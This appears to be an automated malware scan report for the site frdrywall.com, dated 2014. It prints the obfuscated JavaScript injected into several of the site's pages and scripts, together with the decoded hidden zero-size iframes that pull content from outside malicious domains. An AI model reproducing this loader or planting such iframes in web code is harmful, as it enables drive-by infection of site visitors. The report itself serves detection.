Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frdrywall.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://frdrywall.com/ | 200 OK Content-Length: 6941 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: alias.jjbworks.com var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!108!105!97!115!46!106!106!98!119!111!114!107!115!46!99!111!109!47!97!110!97!108!121!116!105!99!115!46!112!104!112!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out); Decoded script: <iframe src="http://alias.jjbworks.com/analytics.php" width=0 height=0 frameborder=0></iframe> | ||
http://frdrywall.com/domain.js | 200 OK Content-Length: 17444 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: emails.surreyhill2.com var domain="frdrywall.com"; var sitevar="http://frdrywall.com/builder/resources/preloader_gallery/standard/site66wl.swf"; var siteinitialvar="http://frdrywall.com/builder/resources/preloader_gallery/standard/siteinitial66wl.swf"; var contentpathvar="http://frdrywall.com/"; var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!101!109!97!105!108!115!46!115!117!114!114!101!121!104!105!108!108 ...[3471 bytes skipped]... Decoded script: <iframe src="http://emails.surreyhill2.com/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div id="idMyWait" style="visibility:hidden; position:fixed; top:45%; left:45%; border:5px solid gray; padding:40px; padding-top:10px; background:#fff; text-align:left;"&g ...[391 bytes skipped]... | ||
http://frdrywall.com/site.js | 200 OK Content-Length: 16361 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var introwidth ="980" ; var introheight = "890"; var randomnum = Math.round(10000*Math.random()); embedstring = '<EMBED src='+sitevar+'?siteinitialvar=' + siteinitialvar + '&contentpath='+contentpathvar+ '&urlvar=' + domain + '&randomnum=' + randomnum + ' quality=high scale="exactfit" AllowFullScreen="true" bgcolor=#000000 WIDTH=' + introwidth + ' HEIGHT='+introheight +' NAME="sitecube" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/ge Antivirus reports:
| ||
http://frdrywall.com/html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 20:35:52 GMT Location: http://frdrywall.com/html/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://frdrywall.com/html/ | 200 OK Content-Length: 13813 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: alias.jjbworks.com var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!108!105!97!115!46!106!106!98!119!111!114!107!115!46!99!111!109!47!97!110!97!108!121!116!105!99!115!46!112!104!112!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out); Decoded script: <iframe src="http://alias.jjbworks.com/analytics.php" width=0 height=0 frameborder=0></iframe> | ||
http://frdrywall.com/html/res/jquery.1.3.2.min.js | 200 OK Content-Length: 64082 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <body><script type="text/javascript">var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!101!109!97!105!108!115!46!115!117!114!114!101!121!104!105!108!108!50!46!99!111!109!47!105!110!46!99!103!105!63!100!101!102!97!117!108!116!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt Antivirus reports:
| ||
http://frdrywall.com/res/storetextdes.js | 404 Not Found Content-Length: 336 Content-Type: text/html | clean |
http://frdrywall.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://frdrywall.com/builder/index.php | 200 OK Content-Length: 4937 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: alias.jjbworks.com var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!108!105!97!115!46!106!106!98!119!111!114!107!115!46!99!111!109!47!97!110!97!108!121!116!105!99!115!46!112!104!112!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out); Decoded script: <iframe src="http://alias.jjbworks.com/analytics.php" width=0 height=0 frameborder=0></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frdrywall.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:35:50 GMT
Accept-Ranges: bytes
ETag: "1b1d-4b37124bec100"
Server: Apache
Content-Length: 6941
Content-Type: text/html
Last-Modified: Tue, 06 Dec 2011 19:07:16 GMT
...6941 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: frdrywall.com
Referer: http://www.google.com/search?q=frdrywall.com
Result:
The result is similar to the first query. There are no suspicious redirects found.